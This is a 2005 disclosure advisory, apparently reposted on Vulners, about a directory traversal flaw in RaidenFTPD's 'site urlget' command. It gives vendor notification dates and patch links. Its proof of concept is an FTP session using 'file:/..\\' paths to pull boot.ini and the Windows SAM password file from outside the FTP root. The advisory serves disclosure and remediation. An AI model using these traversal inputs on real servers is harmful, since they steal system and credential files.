`Product : RaidenFTPD
Affected Versions : < 2.4.2241
***
Author: Lachlan. H
Date vendor notified: 19/04/2005
Patch released: 20/04/2005
Disclosure: 02/05/2005
***
Product Description:
RaidenFTPD is an easy-to-use ftp server software for
Windows. With this handy tool you can share your
files with friends, provide file download services to
customers or even setup your own private network file
server. Not only are all the basic FTP server features
built-in; it also features various advanced features
such as SSL/TLS, UTF8, UPnP NAT traversal and more ..
***
Problem:
Directory Traversal - Failure to validate input for
the site command 'urlget'.
Using urlget it's possible for a normal user to escape
ftproot and download known files from restricted
directories.
The JohnLong Team acted promptly to resolve the issue.
***
Fix:
http://www.raidenftpd.com/en/
FULL :
http://www.raidenmaild.com/download/raidenftpd2.exe
UPDATE :
http://www.raidenmaild.com/download/update.exe
***
PoC:
230 User ****** logged in.
ftp> quote site urlget file://\..\\boot.ini
550 site urlget failed : hacking attempt , you have
been logged.
ftp> quote site urlget file:/..\\boot.ini
220 site urlget : downloading
file:/..\\boot.ini->boot.ini
ftp> ls
200 Port command ok.
150 Opening ASCII data connection for ls /.
boot.ini
226-free disk space under this directory : 28919 mb
226 Transfer finished successfully.
Data connection closed .
ftp: 10 bytes received in 0.00 Seconds
10000.00Kbytes/sec.
ftp> quote site urlget file:/..\\winnt/repair/sam
220 site urlget : downloading
file:/..\\winnt/repair/sam->sam
ftp> ls
200 Port command ok.
150 Opening ASCII data connection for ls /.
boot.ini
sam
226-free disk space under this directory : 28919mb
226 Transfer finished successfully.
Data connection closed .
ftp: 15 bytes received in 0.00Seconds
15000.00Kbytes/sec.
ftp>
***
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation